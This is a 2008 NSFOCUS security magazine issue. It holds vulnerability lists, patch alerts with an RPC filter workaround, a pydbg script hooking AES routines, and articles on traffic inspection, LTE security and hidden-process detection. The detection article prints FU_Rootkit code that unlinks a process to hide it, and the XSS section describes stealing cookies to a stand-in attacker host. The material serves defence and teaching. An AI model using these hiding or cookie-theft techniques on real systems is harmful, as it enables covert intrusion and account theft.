2008/12 003
Share technique experience with security professionals
2008/12 003 4 100089 (010)6843 8880-8668 (010)6872 8708 www.nsfocus.com
CONTENTS
2-13: NSFOCUS top ten, November 2008 (p.2); Alert2008-08 (p.5); Alert2008-09 (p.12)
14-29: p.14; p.18; DFI/DPI (p.23)
30-47: p.30; p.37; ring3 Windows hidden processes (p.43)
48-66: 3GPP LTE (p.48); p.52; p.56; p.61
67-76: p.67; p.70; p.72
NSFOCUS top ten vulnerabilities, November 2008
http://www.nsfocus.net/index.php?act=sec_bug&do=top_ten

1. 2008-11-12 Microsoft Windows SMB (MS08-068), NSFOCUS ID: 12608, http://www.nsfocus.net/vulndb/12608
2. 2008-11-12 Microsoft XML Core Services (MS08-069), NSFOCUS ID: 12605, http://www.nsfocus.net/vulndb/12605
3. 2008-11-12 Linux Kernel ndiswrapper, NSFOCUS ID: 12604, http://www.nsfocus.net/vulndb/12604
4. 2008-11-13 Trend Micro ServerProtect RPC, NSFOCUS ID: 12572, http://www.nsfocus.net/vulndb/12572
5. 2008-11-13 Sun Solaris DHCP in.dhcpd(1M), NSFOCUS ID: 12613, http://www.nsfocus.net/vulndb/12613
6. 2008-11-03 Oracle WebLogic Apache, NSFOCUS ID: 12569, http://www.nsfocus.net/vulndb/12569
7. 2008-11-05 Adobe Acrobat Reader 8.1.3, NSFOCUS ID: 12615, http://www.nsfocus.net/vulndb/12615
8. 2008-11-17 Discuz! $_DCACHE, NSFOCUS ID: 12623, http://www.nsfocus.net/vulndb/12623
9. 2008-11-07 VLC Media Player, NSFOCUS ID: 12587, http://www.nsfocus.net/vulndb/12587
10. 2008-11-17 Microsoft LDAP, NSFOCUS ID: 12625, http://www.nsfocus.net/vulndb/12625

Keywords surviving from the entry descriptions: (1) UNC, NTLM, SMB; (2) MSXML, JScript, VBScript, Visual Studio 6.0, XML 1.0, IFRAME; (3) ndiswrapper, ESSID; (4) ServerProtect Server/Express/Integration, RPC, root; (5) in.dhcpd(1M), root; (6) WebLogic Collab, Apache; (7) PDF, JavaScript, Type 1; (8) wap\index.php, Chinese Convert, post, SQL; (9) cue, rt; (10) LDAP, NULL.
(Alert2008-08) Microsoft October 2008 security bulletins
Nsfocus [email protected] http://www.nsfocus.com
2008-10-15

Bulletins released (11 in total):

1. MS08-056 - Microsoft Office (957699)
   Affected: Microsoft Office XP Service Pack 3.
   Keywords: CDO protocol handler (cdo:), Content-Disposition: Attachment.
2. MS08-057 - Microsoft Excel (956416)
   Affected: Excel 2000 SP3; Excel 2002 SP3; Excel 2003 SP2; Excel 2003 SP3; Excel 2007; Excel 2007 SP1; Microsoft Office Excel Viewer 2003; Excel Viewer 2003 SP3; Microsoft Office Excel Viewer; Compatibility Pack for Word, Excel and PowerPoint 2007 File Formats and its SP1; Microsoft Office SharePoint Server 2007 and SP1; SharePoint Server 2007 x64 Edition and SP1; Microsoft Office 2004 for Mac; Microsoft Office 2008 for Mac; Open XML File Format Converter for Mac.
   Keywords: Excel VBA; VBE6.DLL ACL (Everyone); MOICE.
3. MS08-058 - Internet Explorer (956390)
   Affected: Microsoft Internet Explorer 5.01 SP4; Internet Explorer 6 SP1; Internet Explorer 6; Windows Internet Explorer 7.
   Keywords: ActiveX; Internet and Intranet zones.
4. MS08-059 - Host Integration Server RPC (956695)
   Affected: Microsoft Host Integration Server 2000 SP2; HIS 2000; HIS 2004; HIS 2004 SP1; HIS 2006; HIS 2006 x64.
   Keywords: SNA, RPC.
5. MS08-060 - (957280)
   Affected: Microsoft Windows 2000 Server SP4.
   Keywords: LDAP/LDAPS, TCP 389 and 636.
6. MS08-061 - Windows (954211)
7. MS08-062 - Windows Internet (953155)
   Keywords: IIS, IPP.
8. MS08-063 - SMB (957095)
9. MS08-064 - (956841)
   Keywords: VADs.
10. MS08-065 - (951071)
   Keywords: RPC.
11. MS08-066 - Microsoft (956803)
   Keywords: afd.sys.

Windows versions listed as affected across the Windows bulletins (6-11): Microsoft Windows 2000 SP4; Windows XP SP2; Windows XP SP3; Windows XP Professional x64 Edition; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP1; Windows Server 2003 SP2; Windows Server 2003 x64 Edition; Windows Server 2003 x64 Edition SP2; Windows Server 2003 SP1 and SP2 for Itanium-based Systems; Windows Vista; Windows Vista SP1; Windows Vista x64 Edition; Windows Vista x64 Edition SP1; Windows Server 2008 for 32-bit, x64-based and Itanium-based Systems.

Patches are delivered through "Windows update"; download pages mentioned in the alert:
http://www.microsoft.com/downloads/details.aspx?familyid=b1aee2d5-bfa0-40e3-91b6-98bf65524e8c
http://www.microsoft.com/downloads/details.aspx?familyid=8ed7bb9a-4b26-49d7-8c14-60226d2bc20d
http://www.microsoft.com/downloads/details.aspx?familyid=899e2728-2433-4ccb-a195-05b5d65e5469

References:
1. http://www.microsoft.com/china/technet/security/bulletin/MS08-056.mspx
2. http://www.microsoft.com/china/technet/security/bulletin/MS08-057.mspx
3. http://www.microsoft.com/china/technet/security/bulletin/MS08-058.mspx
4. http://www.microsoft.com/china/technet/security/bulletin/MS08-059.mspx
5. http://www.microsoft.com/china/technet/security/bulletin/MS08-060.mspx
6. http://www.microsoft.com/china/technet/security/bulletin/MS08-061.mspx
7. http://www.microsoft.com/china/technet/security/bulletin/MS08-062.mspx
8. http://www.microsoft.com/china/technet/security/bulletin/MS08-063.mspx
9. http://www.microsoft.com/china/technet/security/bulletin/MS08-064.mspx
10. http://www.microsoft.com/china/technet/security/bulletin/MS08-065.mspx
11. http://www.microsoft.com/china/technet/security/bulletin/MS08-066.mspx
12. http://secunia.com/advisories/32242/
13. http://secunia.com/advisories/32233/
14. http://secunia.com/advisories/32211/
15. http://secunia.com/advisories/32261/
16. http://secunia.com/advisories/32247/
17. http://secunia.com/advisories/32248/
18. http://secunia.com/advisories/32249/
19. http://secunia.com/advisories/32251/
20. http://secunia.com/advisories/32260/
21. http://secunia.com/advisories/32138/
22. http://dvlabs.tippingpoint.com/advisory/TPTI-08-07
23. http://www.zerodayinitiative.com/advisories/ZDI-08-068/
24. http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=746
25. http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745
26. http://www.zerodayinitiative.com/advisories/ZDI-08-069/
(Alert2008-09) Windows Server service RPC vulnerability (MS08-067)
Nsfocus [email protected] http://www.nsfocus.com
2008-10-24
CVE (CAN) ID: CVE-2008-4250
BUGTRAQ ID: 31874

Affected: Microsoft Windows 2000 SP4; Windows XP SP2; Windows XP SP3; Windows XP Professional x64 Edition; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP1; Windows Server 2003 SP2; Windows Server 2003 x64 Edition; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP1 for Itanium-based Systems; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista; Windows Vista SP1; Windows Vista x64 Edition; Windows Vista x64 Edition SP1; Windows Server 2008 for 32-bit Systems; Windows Server 2008 for x64-based Systems; Windows Server 2008 for Itanium-based Systems.

Keywords: Server service, Computer Browser service, RPC, TCP 139 and 445, SYSTEM; Windows 2000 / XP / Server 2003 versus Windows Vista / Server 2008.

Workaround from the alert: block the Server service RPC interface (UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188) with an RPC filter in netsh:

netsh
netsh>rpc
netsh rpc>filter
netsh rpc filter>add rule layer=um actiontype=block
netsh rpc filter>add condition field=if_uuid matchtype=equal data=4b324fc8-1670-01d3-1278-5a47bf6ee188
netsh rpc filter>add filter
netsh rpc filter>quit

Patch: install the update through "Windows update" or from
http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx

References:
1. http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
2. http://www.us-cert.gov/cas/techalerts/TA08-297A.html
3. http://www.kb.cert.org/vuls/id/827267
4. http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx
5. http://secunia.com/advisories/32326/
6. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
7. http://www.nsfocus.net/index.php?act=alert&do=view&aid=94
Download analysis of WindowsServer2003-KB938464-x86-ENU.exe (HASH, P2SP, P2P, BT)

Reference download from download.microsoft.com:
http://download.microsoft.com/download/f/d/0/fd04b854-24eb-4b49-bbfb-ad5d1fdc76f6/WindowsServer2003-KB938464-x86-ENU.exe

Keywords from the traffic analysis: http; http content; AES; Peer / P2P; web; FTP; http/ftp. To observe the plaintext of the AES-encrypted exchanges, the AES encryption and decryption routines inside Thunder5.exe are hooked with Python and pydbg:

import sys
from pydbg import *
from pydbg.defines import *
import utils

# Exit hook on the AES decryption routine: called after the function returns.
def AESDecrypt_hook(dbg, args, ret):
    # Hook body lost in extraction; this placeholder only logs the arguments.
    print "AESDecrypt(0x%08x, 0x%08x) -> 0x%08x" % (args[0], args[1], ret)
    return DBG_CONTINUE

# Entry hook on the AES encryption routine: called before the function body runs.
def AESEncrypt_hook(dbg, args):
    # Hook body lost in extraction; this placeholder only logs the arguments.
    print "AESEncrypt(0x%08x, 0x%08x)" % (args[0], args[1])
    return DBG_CONTINUE

dbg = pydbg()
pid = 0
for process in dbg.enumerate_processes():   # (pid, name) tuples
    if process[1] == "Thunder5.exe":
        pid = process[0]
if pid == 0:
    print "process not exist!"
    sys.exit(0)
dbg.attach(pid)

addr_AESDecrypt = 0xAAAAAAAA  # AES decryption function address (fill in from disassembly)
addr_AESEncrypt = 0xBBBBBBBB  # AES encryption function address (fill in from disassembly)
hooks = utils.hook_container()
print "Hooking AESEncryption(0x%x)" % addr_AESEncrypt
print "Hooking AESDecryption(0x%x)" % addr_AESDecrypt
hooks.add(dbg, addr_AESEncrypt, 2, AESEncrypt_hook, None)   # two arguments, entry hook only
hooks.add(dbg, addr_AESDecrypt, 2, None, AESDecrypt_hook)   # two arguments, exit hook only
dbg.run()
DFI (Deep Flow Inspect) and DPI (Deep Packet Inspect)

Keywords surviving from the article: 2008 IDC traffic problems (DNS, P2P, DDoS); application-layer floods named: Http Get Flooding, DNS Request Flooding, CC; management protocols named: SNMP, MRTG, SolarWind, RADIUS, DHCP, SIP. DFI (sections 2.x) identifies P2P from flow records (Netflow, sFlow, IPFIX) by per-IP connection counts (hundreds of peers per host, "netstat"), UDP/TCP mix and the 2/8 and 1/9 traffic ratios, excluding DNS/NETBIOS-related ports 135, 137, 139, 445 and 53. DPI (sections 3.x-4.x) matches payload signatures and features such as URL, TCP-flag, TOS, SIP, HTTP, MSN, VoIP, MAC/IP. Sections 5.x-6.x cover the NSFOCUS NTA and ADS products, POS/GE link monitoring at up to 200Gpps, and the DFI/DPI combination.
Next Generation Security Gateway (NGSG)

Keywords surviving from the article: P2P control; Smart Tunnel (Http 80, pop3 110, IM, EMAIL); WEB attacks, DDoS and CC; TCP/IP SYN/ACK anomaly detection (UDP, ICMP); NIPR; Unicode and Base64 encoded payloads; URL filtering and cloud computing; ASIC/NP versus X86 CPU and ARM/RISC CPU platforms; SMP (Symmetrical Multi-Processing), VLAN, DPI, RAM; 3-5 year product outlook; UI, B/S and C/S, PUT OR GET.
SCAP (Security Content Automation Protocol)

- SCAP: Security Content Automation Protocol, six component specifications: CVE, CCE, CPE, XCCDF, OVAL, CVSS
- FDCC: Federal Desktop Core Configuration (Windows XP, Windows Vista)
- FISMA: The Federal Information Security Management Act
- ISAP: Information Security Automation Program
- NIST maintains FDCC, NVD (National Vulnerability Database) and NCP (National Checklist Program); checklists also exist for Windows, Solaris, Cisco and WAP
- Keywords: IP, WEB, HTTP, DDoS, checklist

NSFOCUS AURORA: Windows, Linux, HP-UX, Oracle, SQL, Cisco, Juniper; Checkmark certification by West Coast Labs; NSIP.
ring3 Windows hidden-process detection

Windows keeps each process in an EPROCESS structure chained through the LIST_ENTRY ActiveProcessLinks field; EPROCESS also carries DWORD UniqueProcessId (Pid) and char ImageFileName[16], and each ETHREAD points back to its process through PEPROCESS ThreadsProcess. PEB and TEB are the user-mode views.

User-mode enumeration APIs:
- Psapi: EnumProcesses()
- ToolHelp32: CreateToolhelp32Snapshot(), Process32First(), Process32Next()
Both end in the Native API NtQuerySystemInformation() with SystemProcessInformation, which calls ExpGetProcessInformation() in the kernel to walk ActiveProcessLinks:

NTSTATUS NtQuerySystemInformation(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);

RootKit hiding techniques:
1. Hook NtQuerySystemInformation() in the SDT and filter the SystemProcessInformation result, e.g. Hacker Defender [1].
2. Unlink the EPROCESS from ActiveProcessLinks (DKOM), e.g. FU_Rootkit [3]:

plist_active_procs = (LIST_ENTRY *)(eproc + FLINKOFFSET);
*((DWORD *)plist_active_procs->Blink) = (DWORD)plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink + 1) = (DWORD)plist_active_procs->Blink;

Walking ActiveProcessLinks in kd on Windows 2000 (ActiveProcessLinks at EPROCESS+0xa0, ImageFileName at +0x1fc):

kd> da poi(PsInitialSystemProcess) + 1fc
81a2fc5c  "System"
kd> da poi(poi(PsInitialSystemProcess)+a0) -a0 + 1fc
8132af5c  "SMSS.EXE"
kd> da poi(poi(poi(PsInitialSystemProcess)+a0)) -a0 + 1fc
8134af5c  "CSRSS.EXE"
kd> da poi(poi(poi(poi(PsInitialSystemProcess)+a0))) -a0 + 1fc
8119375c  "WINLOGON.EXE"

Anti-RootKit approaches (Windows 2000 / NT 5.1 / XP / 2003):
- Klister [4] (Joanna Rutkowska) and KprocCheck [2] (Tan Chew Keong) walk the scheduler lists KiWaitInListHead, KiWaitOutListHead and KiDispatcherReadyListHead to reach ETHREAD structures, then ETHREAD->ThreadsProcess to the EPROCESS.
- SoBeIt, Xfocus, April 2004 [5] (BSOD).
- kkasslin, rootkit.com, August 2004 [6]: hook SwapContext(), prototype __fastcall SwapContext(PETHREAD SwapIn, PETHREAD SwapOut); ETHREAD+0x22c (ThreadsProcess) gives the EPROCESS on NT 5.0/5.1/5.2.

ring3 approach of this article: EPROCESS is also linked through lists that ActiveProcessLinks-unlinking rootkits leave intact: Vm.WorkingSetExpansionLinks (_MMSUPPORT), SessionProcessLinks, and on NT 5.2 (Windows 2003) MmProcessLinks, whose head MmProcessList even includes the Idle process:

kd> dt _EPROCESS ImageFileName poi(MmProcessList)-238
   +0x154 ImageFileName : [16] "Idle"
kd> dt _EPROCESS ImageFileName poi(poi(MmProcessList))-238
   +0x154 ImageFileName : [16] "System"

Windows 2000 EPROCESS also stores the full image path in a _UNICODE_STRING (pImageFileName); on Windows XP/2003 it is SeAuditProcessCreationInfo.ImageFileName->Name:

kd> dt _EPROCESS pImageFileName poi(poi(PsInitialSystemProcess)+a0)-a0
   +0x284 pImageFileName : 0x81363fb8 "\WINNT\system32\SMSS.EXE"

Reading kernel memory from ring3: on NT 5.1/5.2 (Windows XP/2003) the Native API NtSystemDebugControl()/ZwSystemDebugControl() with SysDbgReadKernelMemory [9][10] after EnablePrivilege(SE_DEBUG_NAME); on Windows 2000 \Device\PhysicalMemory (Phrack 59, "Playing with Windows /dev/(k)mem" [7]). PsInitialSystemProcess gives the System EPROCESS, and the ntoskrnl.exe image can be located by its MZ header (4D5A) at the kernel base (0x804e0000 on Windows XP; Windows 2003 uses a different KernBase):

typedef struct _MEMORY_CHUNKS {
    ULONG Address;
    PVOID Data;
    ULONG Length;
} MEMORY_CHUNKS, *PMEMORY_CHUNKS;

MEMORY_CHUNKS QueryBuff;
ULONG ReturnLength;
char Buff[4] = {0};

QueryBuff.Address = 0x804e0000;   // ntoskrnl.exe base on Windows XP
QueryBuff.Data = Buff;
QueryBuff.Length = 2;
ZwSystemDebugControl(SysDbgReadKernelMemory, &QueryBuff, sizeof(MEMORY_CHUNKS), NULL, 0, &ReturnLength);
printf("4D5A: %s\n", Buff);

References:
[1] Hacker Defender, Holy_Father (holy_father@phreaker.net), http://rootkit.host.sk/
[2] KprocCheck, Tan Chew Keong (chewkeong@security.org.sg), http://www.security.org.sg/code/kproccheck.html
[3] FU_Rootkit, fuzen_op ([email protected]), https://www.rootkit.com/vault/fuzen_op/FU_Rootkit.zip
[4] Klister, Joanna Rutkowska ([email protected]), http://www.rootkit.com/vault/joanna/klister-0.4.zip
[5] SoBeIt, http://www.xfocus.net/articles/200404/693.html
[6] Detecting Hidden Processes by Hooking the SwapContext Function, kkasslin ([email protected]), http://www.rootkit.com/newsread_print.php?newsid=170
[7] Playing with Windows /dev/(k)mem, crazylord ([email protected]), http://www.phrack.org/phrack/59/p59-0x10.txt
[8] Windows NT, Flier Lu ([email protected]), http://www.nsfocus.net/index.php?act=magazine&do=view&mid=2119
[9] Native API NtSystemDebugControl ([email protected]), http://www.xfocus.net/articles/200408/721.html
[10] Windows ([email protected]), http://www.xfocus.net/articles/200408/724.html
3GPP LTE (Long Term Evolution) / SAE security

1. Background: 3GPP started LTE (Long Term Evolution) in 2004 as the evolution of 3G, together with SAE (System Architecture Evolution) for the core network. 3GPP security history: 2G GSM with COMP128-1 on the SIM and the AuC; UMTS R99 with Milenage and AKA; R4 (IP transport); R5 (IMS); R6 (GAA, Generic Authentication Architecture, and MBMS, Multimedia Broadcast Multicast Service); R7.

2. LTE/SAE architecture: eNB (Evolved Node B) nodes connected to each other over X2 and to the MME/S-GW (Mobility Management Entity/Serving-Gateway) over S1; interworking with 3G (UTRAN, SGSN) and 2G (GERAN) and non-3GPP access.

3-4. Security domains, following UMTS: (I) network access security (ME-SN, AN-SN, HE-SN), (II) network domain security, (III) user domain security, (IV) application domain security, (V) visibility and configurability. Unlike UMTS, LTE/SAE separates AS (Access Stratum, UE-eNB) and NAS (Non-Access Stratum, UE-MME) security, with user-plane (UP) protection terminating in the eNB.

5. Key hierarchy (rooted in K, shared by USIM and AuC/HSS; CK/IK from UMTS AKA):
- KASME: derived from CK/IK by UE and HSS
- KNASint: derived from KASME by UE and MME, NAS integrity
- KNASenc: derived from KASME by UE and MME, NAS encryption
- KeNB: derived from KASME by UE and MME, passed to the eNB for AS keys
- KUPenc: derived from KeNB by UE and eNB, UP encryption
- KRRCint: derived from KeNB by UE and eNB, RRC integrity
- KRRCenc: derived from KeNB by UE and eNB, RRC encryption

6. LTE/SAE AKA: based on UMTS AKA and Milenage; the HSS/AuC produces a UMTS AV (Authentication Vector) and converts it, with the AMF bit, into an SAE AV carrying Kasme; the UE derives CK/IK on the USIM and the same Kasme.

7. Network domain security (NDS/IP): SEG (security gateways) with Za (IKE/IPsec between SEGs of different domains) and Zb (IPsec between NE and SEG, e.g. NE A-1, NE A-2, NE B-1); eNB to MME/S-GW traffic protected with NDS/IP.

8. Outlook: 3GPP LTE/SAE security specification work continues (R7 and later); eNB and MME/S-GW exposure to the Internet.
TCAF (Trusted Cyber Architecture Framework)

Keywords surviving from the article: IT architecture frameworks IEEE STD 1471, C4ISR, DODAF, GIG, NATO, FEA; Web, SNS, SAP; IPV4, HTTP, DDoS; Internet, SOA, WEB; SNMP, IDS; Checklist; PDCA (Plan, Do, Check, Act) cycle.
XSS questions and answers

Q1: XSS (Cross-site scripting) injects HTML or script (JavaScript, VBScript, ActiveX, Java, Flash) into a Web page; variants are Stored XSS and Reflected XSS; often combined with Social Engineering, AJAX and cookie theft.
Q2: XSS is not CSS (Cascading Style Sheets, W3C, The World Wide Web Consortium); the abbreviation XSS was chosen to avoid the clash.
Q3: Incidents: Samy worm on MySpace (2005); PayPal (2006) [5]; eBay/PayPal (May 2008) [6]; Yahoo! Messenger (May 2008) [7]; Yahoo! V9 [8].
Q4: WASC (Web Application Security Consortium) statistics on the share of XSS among web vulnerabilities [1][2][4] (figures lost in extraction).
Q5-Q6: XSS and cookies.

Reflected XSS example (www.vulnerableexample.com, welcome.cgi with a name parameter):

GET /welcome.cgi?name=Sammi HTTP/1.0
Host: www.vulnerableexample.com

Response: Hi Sammi ... Welcome!

The injected request (payload lost in extraction) reflects script into the page that sends document.cookie to attackerexample.com:

GET /welcome.cgi?name= HTTP/1.0
Host: www.vulnerableexample.com